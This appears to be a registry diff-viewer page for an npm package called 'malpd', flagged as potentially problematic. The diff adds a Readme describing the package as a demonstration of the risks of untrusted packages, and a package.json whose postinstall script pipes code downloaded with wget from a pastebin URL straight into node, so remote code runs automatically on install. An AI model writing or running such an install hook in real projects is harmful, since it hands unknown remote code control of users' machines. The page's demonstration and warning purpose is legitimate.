malpd 0.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of malpd might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/Readme.md +3 -0
  2. package/package.json +13 -0
package/Readme.md ADDED
@@ -0,0 +1,3 @@
1
+ This is to demonstrate why you shouldn't install packages from untrusted sources.
2
+
3
+ Works only on Mac.
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "malpd",
3
+ "version": "0.0.0",
4
+ "repository": "https://github.com/kiloOhm/malicious-pkg-demo",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "postinstall": "wget https://pastebin.com/raw/0yY3Dtcs -O - | node"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }